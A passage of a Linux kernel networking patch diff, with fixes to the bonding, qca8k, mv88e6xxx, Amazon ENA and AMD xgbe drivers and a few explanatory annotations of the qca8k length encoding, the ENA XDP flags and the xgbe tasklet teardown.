+ 				  "Port %d did not find a suitable aggregator\n",
+ 				  port->actor_port_number);
++			return;
+ 		}
+ 	}
+ 	/* if all aggregator's ports are READY_N == TRUE, set ready=TRUE
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b108f2f4adc20..fce9301c8ebbc 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -2653,10 +2653,12 @@ static void bond_miimon_link_change(struct bonding *bond,
+ 
+ static void bond_miimon_commit(struct bonding *bond)
+ {
+-	struct slave *slave, *primary;
++	struct slave *slave, *primary, *active;
+ 	bool do_failover = false;
+ 	struct list_head *iter;
+ 
++	ASSERT_RTNL();
++
+ 	bond_for_each_slave(bond, slave, iter) {
+ 		switch (slave->link_new_state) {
+ 		case BOND_LINK_NOCHANGE:
+@@ -2699,8 +2701,8 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_UP);
+ 
+-			if (!rcu_access_pointer(bond->curr_active_slave) || slave == primary ||
+-			    slave->prio > rcu_dereference(bond->curr_active_slave)->prio)
++			active = rtnl_dereference(bond->curr_active_slave);
++			if (!active || slave == primary || slave->prio > active->prio)
+ 				do_failover = true;
+ 
+ 			continue;
+diff --git a/drivers/net/dsa/mv88e6xxx/Kconfig b/drivers/net/dsa/mv88e6xxx/Kconfig
+index 7a2445a34eb77..e3181d5471dfe 100644
+--- a/drivers/net/dsa/mv88e6xxx/Kconfig
++++ b/drivers/net/dsa/mv88e6xxx/Kconfig
+@@ -2,7 +2,6 @@
+ config NET_DSA_MV88E6XXX
+ 	tristate "Marvell 88E6xxx Ethernet switch fabric support"
+ 	depends on NET_DSA
+-	depends on PTP_1588_CLOCK_OPTIONAL
+ 	select IRQ_DOMAIN
+ 	select NET_DSA_TAG_EDSA
+ 	select NET_DSA_TAG_DSA
+@@ -13,7 +12,8 @@ config NET_DSA_MV88E6XXX
+ config NET_DSA_MV88E6XXX_PTP
+ 	bool "PTP support for Marvell 88E6xxx"
+ 	default n
+-	depends on NET_DSA_MV88E6XXX && PTP_1588_CLOCK
++	depends on (NET_DSA_MV88E6XXX = y && PTP_1588_CLOCK = y) || \
++	           (NET_DSA_MV88E6XXX = m && PTP_1588_CLOCK)
+ 	help
+ 	  Say Y to enable PTP hardware timestamping on Marvell 88E6xxx switch
+ 	  chips that support it.
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index c5c3b4e92f28b..fbcd5c2b13aeb 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -36,44 +36,6 @@ qca8k_split_addr(u32 regaddr, u16 *r1, u16 *r2, u16 *page)
+ 	*page = regaddr & 0x3ff;
+ }
+ 
+-static int
+-qca8k_set_lo(struct qca8k_priv *priv, int phy_id, u32 regnum, u16 lo)
+-{
+-	u16 *cached_lo = &priv->mdio_cache.lo;
+-	struct mii_bus *bus = priv->bus;
+-	int ret;
+-
+-	if (lo == *cached_lo)
+-		return 0;
+-
+-	ret = bus->write(bus, phy_id, regnum, lo);
+-	if (ret < 0)
+-		dev_err_ratelimited(&bus->dev,
+-				    "failed to write qca8k 32bit lo register\n");
+-
+-	*cached_lo = lo;
+-	return 0;
+-}
+-
+-static int
+-qca8k_set_hi(struct qca8k_priv *priv, int phy_id, u32 regnum, u16 hi)
+-{
+-	u16 *cached_hi = &priv->mdio_cache.hi;
+-	struct mii_bus *bus = priv->bus;
+-	int ret;
+-
+-	if (hi == *cached_hi)
+-		return 0;
+-
+-	ret = bus->write(bus, phy_id, regnum, hi);
+-	if (ret < 0)
+-		dev_err_ratelimited(&bus->dev,
+-				    "failed to write qca8k 32bit hi register\n");
+-
+-	*cached_hi = hi;
+-	return 0;
+-}
+-
+ static int
+ qca8k_mii_read32(struct mii_bus *bus, int phy_id, u32 regnum, u32 *val)
+ {
+@@ -97,7 +59,7 @@ qca8k_mii_read32(struct mii_bus *bus, int phy_id, u32 regnum, u32 *val)
+ }
+ 
+ static void
+-qca8k_mii_write32(struct qca8k_priv *priv, int phy_id, u32 regnum, u32 val)
++qca8k_mii_write32(struct mii_bus *bus, int phy_id, u32 regnum, u32 val)
+ {
+ 	u16 lo, hi;
+ 	int ret;
+@@ -105,9 +67,12 @@ qca8k_mii_write32(struct qca8k_priv *priv, int phy_id, u32 regnum, u32 val)
+ 	lo = val & 0xffff;
+ 	hi = (u16)(val >> 16);
+ 
+-	ret = qca8k_set_lo(priv, phy_id, regnum, lo);
++	ret = bus->write(bus, phy_id, regnum, lo);
+ 	if (ret >= 0)
+-		ret = qca8k_set_hi(priv, phy_id, regnum + 1, hi);
++		ret = bus->write(bus, phy_id, regnum + 1, hi);
++	if (ret < 0)
++		dev_err_ratelimited(&bus->dev,
++				    "failed to write qca8k 32bit register\n");
+ }
+ 
+ static int
+@@ -146,7 +111,16 @@ static void qca8k_rw_reg_ack_handler(struct dsa_switch *ds, struct sk_buff *skb)
+ 
+ 	command = get_unaligned_le32(&mgmt_ethhdr->command);
+ 	cmd = FIELD_GET(QCA_HDR_MGMT_CMD, command);
++
+ 	len = FIELD_GET(QCA_HDR_MGMT_LENGTH, command);
++	/* Special case for len of 15 as this is the max value for len and needs to
++	 * be increased before converting it from word to dword.
++	 */
++	if (len == 15)
++		len++;
++
++	/* We can ignore odd values, as we always round them up in the alloc function. */
++	len *= sizeof(u16);
+ 
+ 	/* Make sure the seq match the requested packet */
+ 	if (get_unaligned_le32(&mgmt_ethhdr->seq) == mgmt_eth_data->seq)
+@@ -193,17 +167,33 @@ static struct sk_buff *qca8k_alloc_mdio_header(enum mdio_cmd cmd, u32 reg, u32 *
+ 	if (!skb)
+ 		return NULL;
+ 
+-	/* Max value for len reg is 15 (0xf) but the switch actually return 16 byte
+-	 * Actually for some reason the steps are:
+-	 * 0: nothing
+-	 * 1-4: first 4 byte
+-	 * 5-6: first 12 byte
+-	 * 7-15: all 16 byte
++	/* The mgmt header length value is in steps of word size.
++	 * As an example, to process 4 bytes of data the correct length to set is 2.
++	 * To process 8 bytes set 4, for 12 bytes 6, for 16 bytes 8...
++	 *
++	 * Odd values will always return the next size on the ack packet.
++	 * (A length of 3 (6 bytes) will always return 8 bytes of data.)
++	 *
++	 * This means that a value of 15 (0xf) actually means reading/writing 32 bytes
++	 * of data.
++	 *
++	 * To correctly calculate the length we divide the requested len by word size
++	 * and round up.
++	 * On the ack function we can skip the odd check as we already handle the
++	 * case here.
++	 */
++	real_len = DIV_ROUND_UP(len, sizeof(u16));
++
++	/* We check if the resulting len is odd and round up another time to the
++	 * next size. (A length of 3 will be increased to 4 as the switch will always
++	 * return 8 bytes.)
+ 	 */
+-	if (len == 16)
+-		real_len = 15;
+-	else
+-		real_len = len;
++	if (real_len % sizeof(u16) != 0)
++		real_len++;
++
++	/* Max reg value is 0xf (15) but the switch will always return the next size (32 bytes) */
++	if (real_len == 16)
++		real_len--;
+ 
+ 	skb_reset_mac_header(skb);
+ 	skb_set_network_header(skb, skb->len);
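The two qca8k hunks agree on one encoding: the mgmt header length field counts 16-bit words, odd counts are rounded up by the hardware, and the maximum field value 15 actually transfers 32 bytes. Both directions of the conversion, modelled in plain C:

#include <stdio.h>

/* Bytes -> header length field: count in words, round odd counts up
 * (the switch always returns the next size), and clamp 16 back to the
 * maximum encodable value 15, which still means 32 bytes. */
static unsigned int bytes_to_len_field(unsigned int bytes)
{
	unsigned int words = (bytes + 1) / 2;	/* DIV_ROUND_UP(bytes, 2) */

	if (words % 2)
		words++;
	if (words == 16)
		words--;
	return words;
}

/* Header length field -> bytes actually carried by the ack packet. */
static unsigned int len_field_to_bytes(unsigned int len)
{
	if (len == 15)
		len++;		/* 15 really means 16 words */
	return len * 2;
}

int main(void)
{
	for (unsigned int b = 4; b <= 32; b += 4)
		printf("%2u bytes -> field %2u -> ack %2u bytes\n", b,
		       bytes_to_len_field(b),
		       len_field_to_bytes(bytes_to_len_field(b)));
	return 0;
}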
+@@ -417,7 +407,7 @@ qca8k_regmap_write(void *ctx, uint32_t reg, uint32_t val)
+ 	if (ret < 0)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ exit:
+ 	mutex_unlock(&bus->mdio_lock);
+@@ -450,7 +440,7 @@ qca8k_regmap_update_bits(void *ctx, uint32_t reg, uint32_t mask, uint32_t write_
+ 
+ 	val &= ~mask;
+ 	val |= write_val;
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ exit:
+ 	mutex_unlock(&bus->mdio_lock);
+@@ -725,14 +715,14 @@ qca8k_mdio_write(struct qca8k_priv *priv, int phy, int regnum, u16 data)
+ 	if (ret)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ 	ret = qca8k_mdio_busy_wait(bus, QCA8K_MDIO_MASTER_CTRL,
+ 				   QCA8K_MDIO_MASTER_BUSY);
+ 
+ exit:
+ 	/* even if the busy_wait timeouts try to clear the MASTER_EN */
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, 0);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, 0);
+ 
+ 	mutex_unlock(&bus->mdio_lock);
+ 
+@@ -762,7 +752,7 @@ qca8k_mdio_read(struct qca8k_priv *priv, int phy, int regnum)
+ 	if (ret)
+ 		goto exit;
+ 
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, val);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, val);
+ 
+ 	ret = qca8k_mdio_busy_wait(bus, QCA8K_MDIO_MASTER_CTRL,
+ 				   QCA8K_MDIO_MASTER_BUSY);
+@@ -773,7 +763,7 @@ qca8k_mdio_read(struct qca8k_priv *priv, int phy, int regnum)
+ 
+ exit:
+ 	/* even if the busy_wait timeouts try to clear the MASTER_EN */
+-	qca8k_mii_write32(priv, 0x10 | r2, r1, 0);
++	qca8k_mii_write32(bus, 0x10 | r2, r1, 0);
+ 
+ 	mutex_unlock(&bus->mdio_lock);
+ 
+@@ -1943,8 +1933,6 @@ qca8k_sw_probe(struct mdio_device *mdiodev)
+ 	}
+ 
+ 	priv->mdio_cache.page = 0xffff;
+-	priv->mdio_cache.lo = 0xffff;
+-	priv->mdio_cache.hi = 0xffff;
+ 
+ 	/* Check the detected switch id */
+ 	ret = qca8k_read_switch_id(priv);
+diff --git a/drivers/net/dsa/qca/qca8k.h b/drivers/net/dsa/qca/qca8k.h
+index 0b7a5cb123216..03514f7a20bec 100644
+--- a/drivers/net/dsa/qca/qca8k.h
++++ b/drivers/net/dsa/qca/qca8k.h
+@@ -375,11 +375,6 @@ struct qca8k_mdio_cache {
+  * mdio writes
+  */
+ 	u16 page;
+-/* lo and hi can also be cached and from Documentation we can skip one
+- * extra mdio write if lo or hi is didn't change.
+- */
+-	u16 lo;
+-	u16 hi;
+ };
+ 
+ struct qca8k_pcs {
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 8c8b4c88c7dea..451c3a1b62553 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -2400,29 +2400,18 @@ int ena_com_fill_hash_function(struct ena_com_dev *ena_dev,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	switch (func) {
+-	case ENA_ADMIN_TOEPLITZ:
+-		if (key) {
+-			if (key_len != sizeof(hash_key->key)) {
+-				netdev_err(ena_dev->net_device,
+-					   "key len (%u) doesn't equal the supported size (%zu)\n",
+-					   key_len, sizeof(hash_key->key));
+-				return -EINVAL;
+-			}
+-			memcpy(hash_key->key, key, key_len);
+-			rss->hash_init_val = init_val;
+-			hash_key->key_parts = key_len / sizeof(hash_key->key[0]);
++	if ((func == ENA_ADMIN_TOEPLITZ) && key) {
++		if (key_len != sizeof(hash_key->key)) {
++			netdev_err(ena_dev->net_device,
++				   "key len (%u) doesn't equal the supported size (%zu)\n",
++				   key_len, sizeof(hash_key->key));
++			return -EINVAL;
+ 		}
+-		break;
+-	case ENA_ADMIN_CRC32:
+-		rss->hash_init_val = init_val;
+-		break;
+-	default:
+-		netdev_err(ena_dev->net_device, "Invalid hash function (%d)\n",
+-			   func);
+-		return -EINVAL;
++		memcpy(hash_key->key, key, key_len);
++		hash_key->key_parts = key_len / sizeof(hash_key->key[0]);
+ 	}
+ 
++	rss->hash_init_val = init_val;
+ 	old_func = rss->hash_func;
+ 	rss->hash_func = func;
+ 	rc = ena_com_set_hash_function(ena_dev);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_ethtool.c b/drivers/net/ethernet/amazon/ena/ena_ethtool.c
+index 98d6386b7f398..444ccef76da29 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_ethtool.c
++++ b/drivers/net/ethernet/amazon/ena/ena_ethtool.c
+@@ -887,11 +887,7 @@ static int ena_set_tunable(struct net_device *netdev,
+ 	switch (tuna->id) {
+ 	case ETHTOOL_RX_COPYBREAK:
+ 		len = *(u32 *)data;
+-		if (len > adapter->netdev->mtu) {
+-			ret = -EINVAL;
+-			break;
+-		}
+-		adapter->rx_copybreak = len;
++		ret = ena_set_rx_copybreak(adapter, len);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 5a454b58498fd..5ce01ac72637e 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -374,9 +374,9 @@ static int ena_xdp_xmit(struct net_device *dev, int n,
+ 
+ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ {
++	u32 verdict = ENA_XDP_PASS;
+ 	struct bpf_prog *xdp_prog;
+ 	struct ena_ring *xdp_ring;
+-	u32 verdict = XDP_PASS;
+ 	struct xdp_frame *xdpf;
+ 	u64 *xdp_stat;
+ 
+@@ -393,7 +393,7 @@ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 		if (unlikely(!xdpf)) {
+ 			trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 			xdp_stat = &rx_ring->rx_stats.xdp_aborted;
+-			verdict = XDP_ABORTED;
++			verdict = ENA_XDP_DROP;
+ 			break;
+ 		}
+ 
+@@ -409,29 +409,35 @@ static int ena_xdp_execute(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 
+ 		spin_unlock(&xdp_ring->xdp_tx_lock);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_tx;
++		verdict = ENA_XDP_TX;
+ 		break;
+ 	case XDP_REDIRECT:
+ 		if (likely(!xdp_do_redirect(rx_ring->netdev, xdp, xdp_prog))) {
+ 			xdp_stat = &rx_ring->rx_stats.xdp_redirect;
++			verdict = ENA_XDP_REDIRECT;
+ 			break;
+ 		}
+ 		trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_aborted;
+-		verdict = XDP_ABORTED;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_ABORTED:
+ 		trace_xdp_exception(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_aborted;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_DROP:
+ 		xdp_stat = &rx_ring->rx_stats.xdp_drop;
++		verdict = ENA_XDP_DROP;
+ 		break;
+ 	case XDP_PASS:
+ 		xdp_stat = &rx_ring->rx_stats.xdp_pass;
++		verdict = ENA_XDP_PASS;
+ 		break;
+ 	default:
+ 		bpf_warn_invalid_xdp_action(rx_ring->netdev, xdp_prog, verdict);
+ 		xdp_stat = &rx_ring->rx_stats.xdp_invalid;
++		verdict = ENA_XDP_DROP;
+ 	}
+ 
+ 	ena_increase_stat(xdp_stat, 1, &rx_ring->syncp);
+@@ -512,16 +518,18 @@ static void ena_xdp_exchange_program_rx_in_range(struct ena_adapter *adapter,
+ 						 struct bpf_prog *prog,
+ 						 int first, int count)
+ {
++	struct bpf_prog *old_bpf_prog;
+ 	struct ena_ring *rx_ring;
+ 	int i = 0;
+ 
+ 	for (i = first; i < count; i++) {
+ 		rx_ring = &adapter->rx_ring[i];
+-		xchg(&rx_ring->xdp_bpf_prog, prog);
+-		if (prog) {
++		old_bpf_prog = xchg(&rx_ring->xdp_bpf_prog, prog);
++
++		if (!old_bpf_prog && prog) {
+ 			ena_xdp_register_rxq_info(rx_ring);
+ 			rx_ring->rx_headroom = XDP_PACKET_HEADROOM;
+-		} else {
++		} else if (old_bpf_prog && !prog) {
+ 			ena_xdp_unregister_rxq_info(rx_ring);
+ 			rx_ring->rx_headroom = NET_SKB_PAD;
+ 		}
+@@ -672,6 +680,7 @@ static void ena_init_io_rings_common(struct ena_adapter *adapter,
+ 	ring->ena_dev = adapter->ena_dev;
+ 	ring->per_napi_packets = 0;
+ 	ring->cpu = 0;
++	ring->numa_node = 0;
+ 	ring->no_interrupt_event_cnt = 0;
+ 	u64_stats_init(&ring->syncp);
+ }
+@@ -775,6 +784,7 @@ static int ena_setup_tx_resources(struct ena_adapter *adapter, int qid)
+ 	tx_ring->next_to_use = 0;
+ 	tx_ring->next_to_clean = 0;
+ 	tx_ring->cpu = ena_irq->cpu;
++	tx_ring->numa_node = node;
+ 	return 0;
+ 
+ err_push_buf_intermediate_buf:
+@@ -907,6 +917,7 @@ static int ena_setup_rx_resources(struct ena_adapter *adapter,
+ 	rx_ring->next_to_clean = 0;
+ 	rx_ring->next_to_use = 0;
+ 	rx_ring->cpu = ena_irq->cpu;
++	rx_ring->numa_node = node;
+ 
+ 	return 0;
+ }
+@@ -1619,12 +1630,12 @@ static int ena_xdp_handle_buff(struct ena_ring *rx_ring, struct xdp_buff *xdp)
+ 	 * we expect, then we simply drop it
+ 	 */
+ 	if (unlikely(rx_ring->ena_bufs[0].len > ENA_XDP_MAX_MTU))
+-		return XDP_DROP;
++		return ENA_XDP_DROP;
+ 
+ 	ret = ena_xdp_execute(rx_ring, xdp);
+ 
+ 	/* The xdp program might expand the headers */
+-	if (ret == XDP_PASS) {
++	if (ret == ENA_XDP_PASS) {
+ 		rx_info->page_offset = xdp->data - xdp->data_hard_start;
+ 		rx_ring->ena_bufs[0].len = xdp->data_end - xdp->data;
+ 	}
+@@ -1663,7 +1674,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 	xdp_init_buff(&xdp, ENA_PAGE_SIZE, &rx_ring->xdp_rxq);
+ 
+ 	do {
+-		xdp_verdict = XDP_PASS;
++		xdp_verdict = ENA_XDP_PASS;
+ 		skb = NULL;
+ 		ena_rx_ctx.ena_bufs = rx_ring->ena_bufs;
+ 		ena_rx_ctx.max_bufs = rx_ring->sgl_size;
+@@ -1691,7 +1702,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 			xdp_verdict = ena_xdp_handle_buff(rx_ring, &xdp);
+ 
+ 		/* allocate skb and fill it */
+-		if (xdp_verdict == XDP_PASS)
++		if (xdp_verdict == ENA_XDP_PASS)
+ 			skb = ena_rx_skb(rx_ring,
+ 					 rx_ring->ena_bufs,
+ 					 ena_rx_ctx.descs,
+@@ -1709,14 +1720,15 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 				/* Packets was passed for transmission, unmap it
+ 				 * from RX side.
+ 				 */
+-				if (xdp_verdict == XDP_TX || xdp_verdict == XDP_REDIRECT) {
++				if (xdp_verdict & ENA_XDP_FORWARDED) {
+ 					ena_unmap_rx_buff(rx_ring,
+ 							  &rx_ring->rx_buffer_info[req_id]);
+ 					rx_ring->rx_buffer_info[req_id].page = NULL;
+ 				}
+ 			}
+-			if (xdp_verdict != XDP_PASS) {
++			if (xdp_verdict != ENA_XDP_PASS) {
+ 				xdp_flags |= xdp_verdict;
++				total_len += ena_rx_ctx.ena_bufs[0].len;
+ 				res_budget--;
+ 				continue;
+ 			}
+@@ -1760,7 +1772,7 @@ static int ena_clean_rx_irq(struct ena_ring *rx_ring, struct napi_struct *napi,
+ 		ena_refill_rx_bufs(rx_ring, refill_required);
+ 	}
+ 
+-	if (xdp_flags & XDP_REDIRECT)
++	if (xdp_flags & ENA_XDP_REDIRECT)
+ 		xdp_do_flush_map();
+ 
+ 	return work_done;
+@@ -1814,8 +1826,9 @@ static void ena_adjust_adaptive_rx_intr_moderation(struct ena_napi *ena_napi)
+ static void ena_unmask_interrupt(struct ena_ring *tx_ring,
+ 					struct ena_ring *rx_ring)
+ {
++	u32 rx_interval = tx_ring->smoothed_interval;
+ 	struct ena_eth_io_intr_reg intr_reg;
+-	u32 rx_interval = 0;
++
+ 	/* Rx ring can be NULL when for XDP tx queues which don't have an
+ 	 * accompanying rx_ring pair.
+ 	 */
+@@ -1853,20 +1866,27 @@ static void ena_update_ring_numa_node(struct ena_ring *tx_ring,
+ 	if (likely(tx_ring->cpu == cpu))
+ 		goto out;
+ 
++	tx_ring->cpu = cpu;
++	if (rx_ring)
++		rx_ring->cpu = cpu;
++
+ 	numa_node = cpu_to_node(cpu);
++
++	if (likely(tx_ring->numa_node == numa_node))
++		goto out;
++
+ 	put_cpu();
+ 
+ 	if (numa_node != NUMA_NO_NODE) {
+ 		ena_com_update_numa_node(tx_ring->ena_com_io_cq, numa_node);
+-		if (rx_ring)
++		tx_ring->numa_node = numa_node;
++		if (rx_ring) {
++			rx_ring->numa_node = numa_node;
+ 			ena_com_update_numa_node(rx_ring->ena_com_io_cq,
+ 						 numa_node);
++		}
+ 	}
+ 
+-	tx_ring->cpu = cpu;
+-	if (rx_ring)
+-		rx_ring->cpu = cpu;
+-
+ 	return;
+ out:
+ 	put_cpu();
+@@ -1987,11 +2007,10 @@ static int ena_io_poll(struct napi_struct *napi, int budget)
+ 			if (ena_com_get_adaptive_moderation_enabled(rx_ring->ena_dev))
+ 				ena_adjust_adaptive_rx_intr_moderation(ena_napi);
+ 
++			ena_update_ring_numa_node(tx_ring, rx_ring);
+ 			ena_unmask_interrupt(tx_ring, rx_ring);
+ 		}
+ 
+-		ena_update_ring_numa_node(tx_ring, rx_ring);
+-
+ 		ret = rx_work_done;
+ 	} else {
+ 		ret = budget;
+@@ -2376,7 +2395,7 @@ static int ena_create_io_tx_queue(struct ena_adapter *adapter, int qid)
+ 	ctx.mem_queue_type = ena_dev->tx_mem_queue_type;
+ 	ctx.msix_vector = msix_vector;
+ 	ctx.queue_size = tx_ring->ring_size;
+-	ctx.numa_node = cpu_to_node(tx_ring->cpu);
++	ctx.numa_node = tx_ring->numa_node;
+ 
+ 	rc = ena_com_create_io_queue(ena_dev, &ctx);
+ 	if (rc) {
+@@ -2444,7 +2463,7 @@ static int ena_create_io_rx_queue(struct ena_adapter *adapter, int qid)
+ 	ctx.mem_queue_type = ENA_ADMIN_PLACEMENT_POLICY_HOST;
+ 	ctx.msix_vector = msix_vector;
+ 	ctx.queue_size = rx_ring->ring_size;
+-	ctx.numa_node = cpu_to_node(rx_ring->cpu);
++	ctx.numa_node = rx_ring->numa_node;
+ 
+ 	rc = ena_com_create_io_queue(ena_dev, &ctx);
+ 	if (rc) {
+@@ -2805,6 +2824,24 @@ int ena_update_queue_sizes(struct ena_adapter *adapter,
+ 	return dev_was_up ? ena_up(adapter) : 0;
+ }
+ 
++int ena_set_rx_copybreak(struct ena_adapter *adapter, u32 rx_copybreak)
++{
++	struct ena_ring *rx_ring;
++	int i;
++
++	if (rx_copybreak > min_t(u16, adapter->netdev->mtu, ENA_PAGE_SIZE))
++		return -EINVAL;
++
++	adapter->rx_copybreak = rx_copybreak;
++
++	for (i = 0; i < adapter->num_io_queues; i++) {
++		rx_ring = &adapter->rx_ring[i];
++		rx_ring->rx_copybreak = rx_copybreak;
++	}
++
++	return 0;
++}
++
+ int ena_update_queue_count(struct ena_adapter *adapter, u32 new_channel_count)
+ {
+ 	struct ena_com_dev *ena_dev = adapter->ena_dev;
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.h b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+index 1bdce99bf6888..2cb141079474c 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.h
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.h
+@@ -262,9 +262,11 @@ struct ena_ring {
+ 	bool disable_meta_caching;
+ 	u16 no_interrupt_event_cnt;
+ 
+-	/* cpu for TPH */
++	/* cpu and NUMA for TPH */
+ 	int cpu;
+-	 /* number of tx/rx_buffer_info's entries */
++	int numa_node;
++
++	/* number of tx/rx_buffer_info's entries */
+ 	int ring_size;
+ 
+ 	enum ena_admin_placement_policy_type tx_mem_queue_type;
+@@ -392,6 +394,8 @@ int ena_update_queue_sizes(struct ena_adapter *adapter,
+ 
+ int ena_update_queue_count(struct ena_adapter *adapter, u32 new_channel_count);
+ 
++int ena_set_rx_copybreak(struct ena_adapter *adapter, u32 rx_copybreak);
++
+ int ena_get_sset_count(struct net_device *netdev, int sset);
+ 
+ static inline void ena_reset_device(struct ena_adapter *adapter,
+@@ -409,6 +413,15 @@ enum ena_xdp_errors_t {
+ 	ENA_XDP_NO_ENOUGH_QUEUES,
+ };
+ 
++enum ENA_XDP_ACTIONS {
++	ENA_XDP_PASS		= 0,
++	ENA_XDP_TX		= BIT(0),
++	ENA_XDP_REDIRECT	= BIT(1),
++	ENA_XDP_DROP		= BIT(2)
++};
++
++#define ENA_XDP_FORWARDED (ENA_XDP_TX | ENA_XDP_REDIRECT)
++
+ static inline bool ena_xdp_present(struct ena_adapter *adapter)
+ {
+ 	return !!adapter->xdp_bpf_prog;
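/* Annotation, not part of the patch: each ENA_XDP_* action above is a
 * distinct bit, so per-packet verdicts can be OR-accumulated across a
 * NAPI poll and whole classes tested once at the end, as ena_clean_rx_irq()
 * now does with ENA_XDP_REDIRECT and ENA_XDP_FORWARDED.  Hypothetical
 * helper, illustrative only:
 */
static bool ena_xdp_poll_needs_flush(const u32 *verdicts, int n)
{
	u32 xdp_flags = ENA_XDP_PASS;	/* 0: nothing accumulated yet */
	int i;

	for (i = 0; i < n; i++)
		xdp_flags |= verdicts[i];

	/* xdp_do_flush_map() is only needed if anything was redirected */
	return !!(xdp_flags & ENA_XDP_REDIRECT);
}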
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+index 7b666106feee9..614c0278419bc 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-drv.c
+@@ -1064,6 +1064,9 @@ static void xgbe_free_irqs(struct xgbe_prv_data *pdata)
+ 
+ 	devm_free_irq(pdata->dev, pdata->dev_irq, pdata);
+ 
++	tasklet_kill(&pdata->tasklet_dev);
++	tasklet_kill(&pdata->tasklet_ecc);
++
+ 	if (pdata->vdata->ecc_support && (pdata->dev_irq != pdata->ecc_irq))
+ 		devm_free_irq(pdata->dev, pdata->ecc_irq, pdata);
+ 
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c b/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
+index 22d4fc547a0a3..a9ccc4258ee50 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-i2c.c
+@@ -447,8 +447,10 @@ static void xgbe_i2c_stop(struct xgbe_prv_data *pdata)
+ 	xgbe_i2c_disable(pdata);
+ 	xgbe_i2c_clear_all_interrupts(pdata);
+ 
+-	if (pdata->dev_irq != pdata->i2c_irq)
++	if (pdata->dev_irq != pdata->i2c_irq) {
+ 		devm_free_irq(pdata->dev, pdata->i2c_irq, pdata);
++		tasklet_kill(&pdata->tasklet_i2c);
++	}
+ }
+ 
+ static int xgbe_i2c_start(struct xgbe_prv_data *pdata)
+diff --git a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+index 4e97b48695220..0c5c1b1556830 100644
+--- a/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
++++ b/drivers/net/ethernet/amd/xgbe/xgbe-mdio.c
+@@ -1390,8 +1390,10 @@ static void xgbe_phy_stop(struct xgbe_prv_data *pdata)
+ 	/* Disable auto-negotiation */
+ 	xgbe_an_disable_all(pdata);
+ 
+-	if (pdata->dev_irq != pdata->an_irq)
++	if (pdata->dev_irq != pdata->an_irq) {
+ 		devm_free_irq(pdata->dev, pdata->an_irq, pdata);
++		tasklet_kill(&pdata->tasklet_an);
++	}
+ 
+ 	pdata->phy_if.phy_impl.stop(pdata);
+ 
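/* Annotation, not part of the patch: the three xgbe hunks above apply one
 * teardown rule -- free the IRQ first so its handler can no longer
 * schedule the tasklet, then tasklet_kill() to wait out a run that is
 * already queued.  Generic sketch (assumes <linux/interrupt.h>):
 */
static void irq_tasklet_teardown_sketch(struct device *dev, unsigned int irq,
					void *dev_id, struct tasklet_struct *t)
{
	devm_free_irq(dev, irq, dev_id);	/* no new tasklet_schedule() */
	tasklet_kill(t);			/* drain pending/running work */
}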
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 9f8a6ce4b356f..f5a8bae8d79a1 100644
